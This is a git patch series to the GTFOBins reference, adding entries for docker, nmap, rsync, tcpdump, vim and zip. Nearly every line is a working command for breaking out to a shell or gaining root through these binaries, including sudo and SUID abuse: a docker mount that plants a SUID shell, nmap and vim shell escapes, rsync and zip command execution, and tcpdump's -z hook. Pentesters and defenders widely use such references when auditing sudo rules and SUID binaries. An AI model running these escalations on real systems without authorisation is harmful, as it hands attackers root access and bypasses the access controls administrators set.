From 7219385a0528c897bdcf604e0fd6ede1700c0ff8 Mon Sep 17 00:00:00 2001
From: AlessandroZ <zanni.alessandro@gmail.com>
Date: Fri, 17 Aug 2018 17:16:09 +0200
Subject: [PATCH 1/6] add new ways

---
 _gtfobins/docker.md  |  7 +++++++
 _gtfobins/nmap.md    |  9 +++++++++
 _gtfobins/rsync.md   |  9 +++++++++
 _gtfobins/tcpdump.md |  9 +++++++++
 _gtfobins/vim.md     | 19 +++++++++++++++++++
 _gtfobins/zip.md     | 11 +++++++++++
 6 files changed, 64 insertions(+)
 create mode 100644 _gtfobins/docker.md
 create mode 100644 _gtfobins/nmap.md
 create mode 100644 _gtfobins/rsync.md
 create mode 100644 _gtfobins/tcpdump.md
 create mode 100644 _gtfobins/vim.md
 create mode 100644 _gtfobins/zip.md

diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md
new file mode 100644
index 0000000..1bc89b1
--- /dev/null
+++ b/_gtfobins/docker.md
@@ -0,0 +1,7 @@
+---
+functions:
+  execute-interactive:
+    - code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+  sudo-enabled:
+    - code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+---
diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
new file mode 100644
index 0000000..d3632f5
--- /dev/null
+++ b/_gtfobins/nmap.md
@@ -0,0 +1,9 @@
+---
+functions:
+  execute-non-interactive:
+    - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+            nmap --script=/tmp/script.nse
+  sudo-enabled:
+    - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
+            sudo nmap --script=/tmp/script.nse
+---
diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md
new file mode 100644
index 0000000..79ff9e4
--- /dev/null
+++ b/_gtfobins/rsync.md
@@ -0,0 +1,9 @@
+---
+functions:
+  execute-non-interactive:
+    - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+            rsync  -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+  sudo-enabled:
+    - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+            sudo rsync  -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+---
diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
new file mode 100644
index 0000000..5c2165e
--- /dev/null
+++ b/_gtfobins/tcpdump.md
@@ -0,0 +1,9 @@
+---
+functions:
+  execute-non-interactive:
+    - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+            tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+  sudo-enabled:
+    - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
+            sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+---
diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md
new file mode 100644
index 0000000..fb45d0b
--- /dev/null
+++ b/_gtfobins/vim.md
@@ -0,0 +1,19 @@
+---
+functions:
+  execute-interactive:
+    - code: vim -c ':!/bin/sh'
+    - code: |
+        vim
+        :set shell=/bin/sh
+        :shell
+  file-write:
+    - code: |
+        vim file_to_write
+        w
+  file-read:
+    - code: vim file_to_read
+  suid-enabled:
+    - code: ./vim -c ':!/bin/sh -p'
+  sudo-enabled:
+    - code: sudo vim -c ':!/bin/sh'
+---
diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md
new file mode 100644
index 0000000..9d3864f
--- /dev/null
+++ b/_gtfobins/zip.md
@@ -0,0 +1,11 @@
+---
+functions:
+  execute-interactive:
+    - code: echo "/bin/sh" > /tmp/run.sh
+            chmod +x /tmp/run.sh
+            zip z.zip * -T -TT /tmp/run.sh
+  sudo-enabled:
+    - code: echo "/bin/sh" > /tmp/run.sh
+            chmod +x /tmp/run.sh
+            sudo zip z.zip * -T -TT /tmp/run.sh
+---

From c20ade4551cbfadb6768b91ab018b7bd47158713 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Sun, 19 Aug 2018 09:40:37 +0200
Subject: [PATCH 2/6] Make docker disposable, use sh instead of bash and add
 description

---
 _gtfobins/docker.md | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md
index 1bc89b1..c27e24c 100644
--- a/_gtfobins/docker.md
+++ b/_gtfobins/docker.md
@@ -1,7 +1,19 @@
 ---
+description: |
+  Exploit the fact that Docker runs as root to create a SUID binary on the host using a container. This requires the user to be privileged enough to run docker, i.e., being in the `docker` group.
+
+  This creates a SUID shell in the guest file system. Any other Linux images should work, e.g., `debian`.
 functions:
   execute-interactive:
-    - code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+    - code: |
+        docker run --rm -v /home/$USER:/h_docs ubuntu \
+            sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
   sudo-enabled:
-    - code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
+    - code: |
+        sudo docker run --rm -v /home/$USER:/h_docs ubuntu \
+            sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
+  suid-enabled:
+    - code: |
+        ./docker run --rm -v /home/$USER:/h_docs ubuntu \
+            sh -c 'cp /bin/sh /h_docs/sh && chmod +s /h_docs/sh' && ~/sh -p
 ---

From 7822ec33e88c24a0b16db48148ccb9f2848b9cf1 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Sun, 19 Aug 2018 09:52:24 +0200
Subject: [PATCH 3/6] Add suid, description and YAML fixes to nmap

---
 _gtfobins/nmap.md | 17 +++++++++++++----
 1 file changed, 13 insertions(+), 4 deletions(-)

diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md
index d3632f5..cc93942 100644
--- a/_gtfobins/nmap.md
+++ b/_gtfobins/nmap.md
@@ -1,9 +1,18 @@
 ---
 functions:
   execute-non-interactive:
-    - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
-            nmap --script=/tmp/script.nse
+    - description: Echoing of input characters3ers is disabled.
+      code: |
+        echo 'os.execute("/bin/sh")' > /tmp/script.nse
+        nmap --script=/tmp/script.nse
   sudo-enabled:
-    - code: echo "os.execute('/bin/sh')" > /tmp/script.nse
-            sudo nmap --script=/tmp/script.nse
+    - description: Echoing of input characters3ers is disabled.
+      code: |
+        echo 'os.execute("/bin/sh")' > /tmp/script.nse
+        sudo nmap --script=/tmp/script.nse
+  suid-enabled:
+    - description: Echoing of input characters3ers is disabled.
+      code: |
+        echo 'os.execute("/bin/sh -p")' > /tmp/script.nse
+        ./nmap --script=/tmp/script.nse
 ---

From acf29564cb554056c3439bbd97bc2d48abb5f28d Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Sun, 19 Aug 2018 10:12:08 +0200
Subject: [PATCH 4/6] Simplify rsync and add interactive execute

---
 _gtfobins/rsync.md | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md
index 79ff9e4..754d848 100644
--- a/_gtfobins/rsync.md
+++ b/_gtfobins/rsync.md
@@ -1,9 +1,9 @@
 ---
 functions:
-  execute-non-interactive:
-    - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
-            rsync  -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+  execute-interactive:
+    - code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
   sudo-enabled:
-    - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
-            sudo rsync  -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
+    - code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
+  suid-enabled:
+    - code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null
 ---

From 2ff760e5605e6915a9ba100166645038a21534a6 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Sun, 19 Aug 2018 10:31:04 +0200
Subject: [PATCH 5/6] Fix and simplify tcpdump

---
 _gtfobins/tcpdump.md | 18 +++++++++++++-----
 1 file changed, 13 insertions(+), 5 deletions(-)

diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
index 5c2165e..aa3368a 100644
--- a/_gtfobins/tcpdump.md
+++ b/_gtfobins/tcpdump.md
@@ -1,9 +1,17 @@
 ---
 functions:
   execute-non-interactive:
-    - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
-            tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
-  sudo-enabled:
-    - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
-            sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
+    - code: |
+        COMMAND='id > /tmp/output'
+        TF=$(mktemp -u)
+        echo "$COMMAND" > $TF
+        chmod +x $TF
+        tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
+  suid-enabled:
+    - code: |
+        COMMAND='id > /tmp/output'
+        TF=$(mktemp -u)
+        echo "$COMMAND" > $TF
+        chmod +x $TF
+        sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
 ---

From f740b410cc6e80bde44c2a66f266801814207dc5 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Sun, 19 Aug 2018 11:26:08 +0200
Subject: [PATCH 6/6] Simplify zip and add suid-limited

---
 _gtfobins/zip.md | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)

diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md
index 9d3864f..13f9031 100644
--- a/_gtfobins/zip.md
+++ b/_gtfobins/zip.md
@@ -1,11 +1,15 @@
 ---
 functions:
   execute-interactive:
-    - code: echo "/bin/sh" > /tmp/run.sh
-            chmod +x /tmp/run.sh
-            zip z.zip * -T -TT /tmp/run.sh
+    - code: |
+        zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+        rm /tmp/x.zip
   sudo-enabled:
-    - code: echo "/bin/sh" > /tmp/run.sh
-            chmod +x /tmp/run.sh
-            sudo zip z.zip * -T -TT /tmp/run.sh
+    - code: |
+        sudo zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+        sudo rm /tmp/x.zip
+  suid-limited:
+    - code: |
+        ./zip /tmp/x.zip /etc/hosts -T -TT 'sh #'
+        sudo rm /tmp/x.zip
 ---